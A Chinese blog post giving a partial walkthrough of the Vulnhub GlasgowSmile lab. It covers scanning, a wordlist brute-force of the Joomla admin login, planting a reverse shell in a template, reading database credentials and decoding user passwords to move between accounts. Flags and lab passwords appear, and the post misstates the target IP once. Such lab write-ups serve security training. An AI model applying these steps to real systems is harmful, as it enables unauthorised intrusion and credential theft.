首页 > 其他分享 >Vulnhub之GlasgowSmile靶机测试过程(部分)

Vulnhub之GlasgowSmile靶机测试过程(部分)

时间:2023-02-23 22:35:54浏览次数:50  
标签:10.1 GlasgowSmile kali rob 1.148 abner 2020 Vulnhub 靶机

GlasgowSmile

识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24   |   Screen View: Unique Hosts                                                                                            
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.1.1.1        00:50:56:c0:00:01      1      60  VMware, Inc.                                                                                             
 10.1.1.148      00:0c:29:e1:23:04      1      60  VMware, Inc.                                                                                             
 10.1.1.254      00:50:56:ee:66:c6      1      60  VMware, Inc.            

利用Kali Linux自带的Netdiscover工具识别目标主机的IP地址为10.1.1.254

NMAP扫描

──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.148 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-23 05:54 EST
Nmap scan report for 10.1.1.148
Host is up (0.0063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6734481f250ed7b3eabb361122608fa1 (RSA)
|   256 4c8c4565a484e8b1507777a93a960631 (ECDSA)
|_  256 09e994236097f720cceed6c19bda188e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:E1:23:04 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.95 seconds

NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)

获得Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ ls
joker.jpg  nmap_full_scan
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ steghide extract -sf joker.jpg                         
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ stegseek joker.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.37% (132.6 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ exiftool joker.jpg   
ExifTool Version Number         : 12.49
File Name                       : joker.jpg
Directory                       : .
File Size                       : 263 kB
File Modification Date/Time     : 2023:02:23 05:56:51-05:00
File Access Date/Time           : 2023:02:23 05:57:08-05:00
File Inode Change Date/Time     : 2023:02:23 05:56:51-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 96
Y Resolution                    : 96
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1920x1080
Megapixels                      : 2.1

┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ nikto -h http://10.1.1.148
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.148
+ Target Hostname:    10.1.1.148
+ Target Port:        80
+ Start Time:         2023-02-23 08:18:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 7d, size: 5a7fbb701d4b6, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7889 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-02-23 08:19:12 (GMT-5) (68 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 

┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ gobuster dir -u http://10.1.1.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.148
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,txt,html,sh
[+] Timeout:                 10s
===============================================================
2023/02/23 08:20:30 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 125]
/joomla               (Status: 301) [Size: 309] [--> http://10.1.1.148/joomla/]
/how_to.txt           (Status: 200) [Size: 456]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 1098668 / 1102805 (99.62%)
===============================================================
2023/02/23 08:22:06 Finished
===============================================================
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ curl http://10.1.1.148/how_to.txt

Hi Rob,
Forgive My Laughter. I Have A Condition

Take care


  ________     ____      __   ___    _____   ______    
 (___  ___)   / __ \    () ) / __)  / ___/  (   __ \   
     ) )     / /  \ \   ( (_/ /    ( (__     ) (__) )  
    ( (     ( ()  () )  ()   (      ) __)   (    __/   
 __  ) )    ( ()  () )  () /\ \    ( (       ) \ \  _  
( (_/ /      \ \__/ /   ( (  \ \    \ \___  ( ( \ \_)) 
 \___/        \____/    ()_)  \_\    \____\  )_) \__/  

Rob会不会是用户名?

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ dirb http://10.1.1.148

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Feb 23 08:24:09 2023
URL_BASE: http://10.1.1.148/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.1.1.148/ ----
+ http://10.1.1.148/index.html (CODE:200|SIZE:125)                                                                                                          
==> DIRECTORY: http://10.1.1.148/joomla/                                                                                                                    
+ http://10.1.1.148/server-status (CODE:403|SIZE:275)                                                                                                       
                                                                                                                                                            
---- Entering directory: http://10.1.1.148/joomla/ ----
==> DIRECTORY: http://10.1.1.148/joomla/administrator/    

发现了页面:

http://10.1.1.148/joomla/administrator/index.php
                                                                                                                                                            
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ wfuzz -u http://10.1.1.148/joomla/cli/?FUZZ=id  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 2
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.1.1.148/joomla/cli/?FUZZ=id
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                     
=====================================================================


Total time: 0
Processed Requests: 220560
Filtered Requests: 220560
Requests/sec.: 0

至此均没有啥收获

──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ cewl http://10.1.1.148/joomla/ -w dict.txt
CeWL 5.5.2 (Grouping) Robin Wood ([email protected]) (https://digi.ninja/)
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ wc -l dict.txt                            
165 dict.txt

cewl工具产生密码字典,用burpsuite intruder破解登录密码,假设用户名为joomla,破解出密码为Gotham,登录administrator管理后台

找到Extensions->templates->templates->beez3上传反弹shell。

点击template preview。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ sudo nc -nlvp 5555                                     
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.148] 53102
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
 07:56:21 up  3:06,  0 users,  load average: 0.00, 0.05, 0.31
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

www-data@glasgowsmile:/var/www/joomla2$ cat configuration.php
cat configuration.php
<?php
class JConfig {
        public $offline = '0';
        public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
        public $display_offline_message = '1';
        public $offline_image = '';
        public $sitename = 'Joker';
        public $editor = 'tinymce';
        public $captcha = '0';
        public $list_limit = '20';
        public $access = '1';
        public $debug = '0';
        public $debug_lang = '0';
        public $dbtype = 'mysqli';
        public $host = 'localhost';
        public $user = 'joomla';
        public $password = 'babyjoker';
        public $db = 'joomla_db';

MariaDB [batjoke]> select * from taskforce;
select * from taskforce;
+----+---------+------------+---------+----------------------------------------------+
| id | type    | date       | name    | pswd                                         |
+----+---------+------------+---------+----------------------------------------------+
|  1 | Soldier | 2020-06-14 | Bane    | YmFuZWlzaGVyZQ==                             |
|  2 | Soldier | 2020-06-14 | Aaron   | YWFyb25pc2hlcmU=                             |
|  3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ==                         |
|  4 | Soldier | 2020-06-14 | buster  | YnVzdGVyaXNoZXJlZmY=                         |
|  6 | Soldier | 2020-06-14 | rob     | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
|  7 | Soldier | 2020-06-14 | aunt    | YXVudGlzIHRoZSBmdWNrIGhlcmU=                 |
+----+---------+------------+---------+----------------------------------------------+
6 rows in set (0.000 sec)


──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/' | base64 -d
???AllIHaveAreNegativeThoughts???                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'YmFuZWlzaGVyZQ==' | base64 -d                            
baneishere                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ ssh [email protected]                                                         
The authenticity of host '10.1.1.148 (10.1.1.148)' can't be established.
ED25519 key fingerprint is SHA256:bVGopxZOACv+Dy/jm+EmAyAQm+YSDTmVK1pVrNUz+P8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.1.1.148' (ED25519) to the list of known hosts.
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:24:25 2020 from 192.168.10.172
rob@glasgowsmile:~$ id
uid=1000(rob) gid=1000(rob) groups=1000(rob),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
rob@glasgowsmile:~$ 

提权

用cyberchef破解,编码格式为ROT13,先用ROT13-bruteforce得到amount=1,从而解码成功:

Hello Dear, Arthur suffers from severe mental illness but we see little sympathy for his condition. This relates to his feeling about being ignored. You can find an entry in his journal reads, "The worst part of having a mental illness is people expect you to behave as if you don't."
Now I need your help Abner, use this password, you will find the right way to solve the enigma. STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==

这样就得到aber的密码

┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==' | base64 -d
I33hope99my0death000makes44more8cents00than0my0life0         
                                                                                                                                                            
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/' | base64 -d
???AllIHaveAreNegativeThoughts???                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'YmFuZWlzaGVyZQ==' | base64 -d                            
baneishere                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ ssh [email protected]                                                         
The authenticity of host '10.1.1.148 (10.1.1.148)' can't be established.
ED25519 key fingerprint is SHA256:bVGopxZOACv+Dy/jm+EmAyAQm+YSDTmVK1pVrNUz+P8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.1.1.148' (ED25519) to the list of known hosts.
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:24:25 2020 from 192.168.10.172
rob@glasgowsmile:~$ id
uid=1000(rob) gid=1000(rob) groups=1000(rob),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
rob@glasgowsmile:~$ ls -alh
total 52K
drwxr-xr-x 3 rob  rob  4.0K Jun 16  2020 .
drwxr-xr-x 5 root root 4.0K Jun 15  2020 ..
-rw-r----- 1 rob  rob   454 Jun 14  2020 Abnerineedyourhelp
-rw------- 1 rob  rob     7 Feb 23 04:50 .bash_history
-rw-r--r-- 1 rob  rob   220 Jun 13  2020 .bash_logout
-rw-r--r-- 1 rob  rob  3.5K Jun 13  2020 .bashrc
-rw-r----- 1 rob  rob   313 Jun 14  2020 howtoberoot
drwxr-xr-x 3 rob  rob  4.0K Jun 13  2020 .local
-rw------- 1 rob  rob    81 Jun 15  2020 .mysql_history
-rw-r--r-- 1 rob  rob   807 Jun 13  2020 .profile
-rw-r--r-- 1 rob  rob    66 Jun 15  2020 .selected_editor
-rw-r----- 1 rob  rob    38 Jun 13  2020 user.txt
-rw------- 1 rob  rob   429 Jun 16  2020 .Xauthority
rob@glasgowsmile:~$ cat user.txt
JKR[f5bb11acbb957915e421d62e7253d27a]
rob@glasgowsmile:~$ cat Abnerineedyourhelp
Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
rob@glasgowsmile:~$ 

rob@glasgowsmile:~$ su - aber
su: user aber does not exist
rob@glasgowsmile:~$ su - abner
Password: 
abner@glasgowsmile:~$ id
uid=1001(abner) gid=1001(abner) groups=1001(abner)
abner@glasgowsmile:~$ sudo -l
-bash: sudo: command not found
abner@glasgowsmile:~$ ls -alh
total 44K
drwxr-xr-x 4 abner abner 4.0K Jun 16  2020 .
drwxr-xr-x 5 root  root  4.0K Jun 15  2020 ..
-rw------- 1 abner abner  167 Feb 23 04:50 .bash_history
-rw-r--r-- 1 abner abner  220 Jun 14  2020 .bash_logout
-rw-r--r-- 1 abner abner 3.5K Jun 14  2020 .bashrc
-rw-r----- 1 abner abner  565 Jun 16  2020 info.txt
drwxr-xr-x 3 abner abner 4.0K Jun 14  2020 .local
-rw-r--r-- 1 abner abner  807 Jun 14  2020 .profile
drwx------ 2 abner abner 4.0K Jun 15  2020 .ssh
-rw-r----- 1 abner abner   38 Jun 16  2020 user2.txt
-rw------- 1 abner abner  399 Jun 15  2020 .Xauthority
abner@glasgowsmile:~$ cat user2.txt
JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
abner@glasgowsmile:~$ cat info.txt
A Glasgow smile is a wound caused by making a cut from the corners of a victim's mouth up to the ears, leaving a scar in the shape of a smile.
The act is usually performed with a utility knife or a piece of broken glass, leaving a scar which causes the victim to appear to be smiling broadly.
The practice is said to have originated in Glasgow, Scotland in the 1920s and 30s. The attack became popular with English street gangs (especially among the Chelsea Headhunters, a London-based hooligan firm, among whom it is known as a "Chelsea grin" or "Chelsea smile").

成功登陆到abner,试了一些提权方式,都没有可利用的。而/home里还有个penguin不能打开,但查看历史命令发现解压了一个.dear_penguins.zip。

标签:10.1,GlasgowSmile,kali,rob,1.148,abner,2020,Vulnhub,靶机
From: https://www.cnblogs.com/jason-huawen/p/17149688.html

相关文章

  • VulnHub-Potato (SunCSR): 1
    VulnHub-covfefe:1靶机地址:https://www.vulnhub.com/entry/potato-suncsr-1,556/目标:获取根外壳,即(root@localhost:~#),然后在/root下获取标志)一、主机发现nmap-sP......
  • cfs三层靶机内网渗透
    cfs三层靶机内网渗透靶机下载地址:https://pan.baidu.com/share/init?surl=O9pgm9UZCSIdifMEb0E9ZA#list/path=%2F提取码:qazz具体的环境配置以及靶机IP如下图所示攻击机......
  • Vulnhub之Fivebox 2靶机测试过程(部分)
    Fivebox2识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24......
  • Vulnhub之Five86 1靶机详细测试过程
    Five861作者:jason_huawen靶机信息名称:five86:1地址:https://www.vulnhub.com/entry/five86-1,417/识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Five86_1]└─$s......
  • vulnhub靶场之DRIFTINGBLUES: 9 (FINAL)
    准备:攻击机:虚拟机kali、本机win10。靶机:DriftingBlues:9(final),下载地址:https://download.vulnhub.com/driftingblues/driftingblues9.ova,下载后直接vbox打开即可。知......
  • Vulnhub:ReconForce-01.1靶机
    kali:192.168.111.111靶机:192.168.111.200信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.200访问目标ftp得到提示:Security@hackNos访问......
  • [Vulnhub] CHERRY: 1
    下载地址0x00配置攻击机IP:192.168.10.5靶机IP:192.168.10.70x01攻击用Namp扫描靶机开放的端口┌──(root㉿azwhikaru)-[/home/azwhikaru/Desktop]└─#n......
  • [Vulnhub] FIRSTBLOOD: 1
    下载地址0x00配置攻击机IP:192.168.10.5靶机IP:192.168.10.60x01攻击使用Nmap扫描靶机开放的端口┌──(root㉿azwhikaru)-[~]└─#nmap-A192.168.10.6......
  • Vulnhub之Kioptrix Level 2靶机详细测试过程(提权成功)
    KioptrixLevel2识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]└─$sudonetdiscover-ieth1-r10.1.1.0/24Currentlyscanning:10.1.1.0/24......
  • Vulnhub之Kioptrix Level 1靶机详细测试过程(不同的拿shell方法,利用OpenFuck漏洞)
    KioptrixLevel1作者:jason_huawen靶机信息名称:Kioptrix:Level1(#1)地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/识别目标主机IP地址(kali㉿kal......